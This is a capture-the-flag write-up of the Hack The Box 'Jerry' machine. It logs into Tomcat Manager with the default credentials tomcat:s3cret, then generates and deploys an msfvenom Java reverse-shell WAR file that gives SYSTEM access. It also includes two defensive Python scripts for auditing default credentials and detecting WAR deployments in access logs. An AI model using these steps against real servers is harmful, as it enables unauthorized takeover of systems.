# Jerry

![info-card](/files/-M-D-8KbWY2nMALAeR2k)

## Initial Enumeration

Our initial enumeration doesn't leave much to the imagination here: a quick nmap scan returns only one open port.

```bash
nmap -sV 10.10.10.95
```

![Nmap Results](/files/-M-D-8KdGUSIWz0SYOMH)

Naturally we assume Tomcat is our target for this box. On Tomcat instances you can reach the management console at `/manage`, but if you didn't already know that, you can find it using gobuster:

```bash
gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50
```

![Gobuster Results](/files/-M-D-8KfX5YTQ0P4C4O0)

For the login we treat it like any other application and Google for default credentials. Doing this brought me to a great GitHub repository of default credentials, where I found [this](https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown) page. Using the credentials `tomcat:s3cret` from that list gives us access.
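The flip side of that credential list, from the defender's chair, is checking your own `tomcat-users.xml` against it before someone else does. The script below is an added example for this writeup (not the author's code and not part of the Tomcat project): it parses a `tomcat-users.xml`, flags any account whose username/password pair appears in a small constructed subset of the default-credential list, and flags Manager-role accounts with short passwords. The role names are Tomcat's real Manager/Host Manager roles; the sample config, the credential subset and the 12-character minimum are assumptions made for the example.

```python
"""Audit a Tomcat tomcat-users.xml for Manager accounts that use well-known
default credentials. Added example for this writeup; not part of the original
post or of the Tomcat project."""
import xml.etree.ElementTree as ET

# Hand-picked subset of well-known Tomcat default username/password pairs
# (constructed sample; the list the writeup links to is far longer).
DEFAULT_CREDENTIALS = {
    ("tomcat", "s3cret"),
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("admin", ""),
    ("manager", "manager"),
    ("role1", "tomcat"),
}

# Roles that grant access to the Manager / Host Manager applications, i.e. the
# ability to deploy a WAR and therefore to run code as the Tomcat service user.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}

MIN_PASSWORD_LENGTH = 12  # assumed local policy for Manager accounts

# Constructed sample in the shape of a weak tomcat-users.xml.
SAMPLE_CONFIG = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="admin" password="admin" roles="probe"/>
  <user username="deploy" password="Xk9#qL2!vBn4" roles="manager-script"/>
  <user username="ops" password="short1" roles="manager-status"/>
</tomcat-users>
"""


def _local_name(tag):
    """Strip the XML namespace from an element tag ('{ns}user' -> 'user')."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return findings for every <user> that is a default or weak Manager account.

    Passwords are assumed to be stored in clear text (the Tomcat default); if a
    CredentialHandler is configured the password attribute holds a hash and the
    default-credential comparison below will not match.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat accepts either attribute name for the user name.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        manager_roles = sorted(roles & MANAGER_ROLES)
        is_default = (name, password) in DEFAULT_CREDENTIALS

        if is_default and manager_roles:
            severity, reason = "critical", "default credentials on a Manager account"
        elif is_default:
            severity, reason = "high", "default credentials"
        elif manager_roles and len(password) < MIN_PASSWORD_LENGTH:
            severity, reason = "medium", "short password on a Manager account"
        else:
            continue
        findings.append({"user": name, "severity": severity,
                         "manager_roles": manager_roles, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_CONFIG):
        print(f"[{f['severity']}] {f['user']}: {f['reason']} {f['manager_roles']}")
```

Run it against the real file (`$CATALINA_BASE/conf/tomcat-users.xml`) and swap in the full credential list from the linked repository; the `tomcat:s3cret` account on this box would come back as critical because it combines a published password with `manager-gui`.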

## Execution

Looking at the management console, we see something that catches our eye as a path to execution:

![WAR Upload Form](/files/-M-D-8KhpeH8XCWaL5L9)

Now that we know we can deploy `war` files to the server, we can generate a reverse shell with `msfvenom`:

```bash
msfvenom -p java/shell_reverse_tcp LHOST=$(tunip) LPORT=4443 -f war > evil.war
```

{% hint style="info" %}
`tunip` is a handy bash alias I use to get my current IP address for Hack The Box. It is set to `ifconfig tun0 | sed -n '2 p' | awk '{print \$2}'` in my `~/.bash_aliases`.
{% endhint %}

{% hint style="danger" %}
If you happen to work out of a folder shared between your Kali VM and Windows like I do, Windows Defender will nuke this file as soon as you generate it, so it's best to do this somewhere else (I just generated it in `/tmp`).
{% endhint %}

After uploading this file we can see it in the list of running applications:

![Evil War Application](/files/-M-D-8Kj7Mp_7HoBnJnH)

Clicking the link to our malicious application triggers the reverse shell. As it happens, Tomcat runs as `nt authority/system` in this case, so we now have full access to the system and can read the user and root flags:

![User and Root Flags](/files/-M-D-8KlvERQiHSHW5kx)
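Every step of that deployment leaves a trace in Tomcat's access log: a login to `/manager/html`, a `POST` to the upload endpoint, and then the first request to the new context. The script below is an added example for this writeup (not the author's code and not part of the Tomcat project) that runs two rules over constructed access-log lines in Tomcat's default `%h %l %u %t "%r" %s %b` format: any successful request to a Manager deploy endpoint is reported (high severity unless the source host is on an admin allowlist), and any successful Manager-console request from a host outside the allowlist is reported as medium. The sample log lines, the allowlist and the severities are assumptions; the endpoint paths are the Manager application's real HTML-upload and text-API deploy URLs.

```python
"""Flag WAR deployments and unexpected Manager-console access in Tomcat
access-log lines. Added example for this writeup; not part of the original
post or of the Tomcat project."""
import re

# Tomcat's default "common" access-log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager endpoints that deploy an application: the HTML form upload used in
# the writeup, and the text/script API used by build tooling.
DEPLOY_ENDPOINTS = {
    ("POST", "/manager/html/upload"),
    ("PUT", "/manager/text/deploy"),
    ("GET", "/manager/text/deploy"),
}

# Hosts expected to administer Tomcat (constructed allowlist for the sample).
ADMIN_ALLOWLIST = {"10.10.10.2"}

# Constructed sample lines in the shape of a Tomcat access log.
SAMPLE_LOG = """\
10.10.10.2 - tomcat [14/Jun/2020:18:01:10 +0000] "GET /manager/html HTTP/1.1" 200 14322
10.10.14.5 - - [14/Jun/2020:18:04:51 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [14/Jun/2020:18:05:02 +0000] "GET /manager/html HTTP/1.1" 200 14322
10.10.14.5 - tomcat [14/Jun/2020:18:05:22 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 15011
10.10.14.5 - - [14/Jun/2020:18:05:40 +0000] "GET /evil/ HTTP/1.1" 200 0
10.10.10.2 - tomcat [14/Jun/2020:18:20:00 +0000] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 52
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(text, allowlist=ADMIN_ALLOWLIST):
    """Return alerts for successful deployments and Manager access from unexpected hosts."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != "200":
            continue  # only successful requests matter for these two rules
        path = rec["path"].split("?", 1)[0]  # drop the query string (CSRF nonce, path=)
        trusted = rec["ip"] in allowlist
        if (rec["method"], path) in DEPLOY_ENDPOINTS:
            alerts.append({
                "ip": rec["ip"], "user": rec["user"], "ts": rec["ts"],
                "severity": "info" if trusted else "high",
                "reason": f"application deployed via {rec['method']} {path}",
            })
        elif path.startswith("/manager/") and not trusted:
            alerts.append({
                "ip": rec["ip"], "user": rec["user"], "ts": rec["ts"],
                "severity": "medium",
                "reason": "Manager console reached from a host outside the allowlist",
            })
    return alerts


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['ts']} {a['ip']} ({a['user']}): {a['reason']}")
```

On the sample, the upload from `10.10.14.5` is the high-severity hit and the later `PUT` from the allowlisted admin host is informational. The reason a WAR upload on this box ends the game is the point the writeup makes about `nt authority/system`: the deployed application runs with whatever privileges the Tomcat service has, so running the service under a dedicated low-privilege account and restricting who can reach the Manager application bounds the damage that a leaked Manager password can do.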

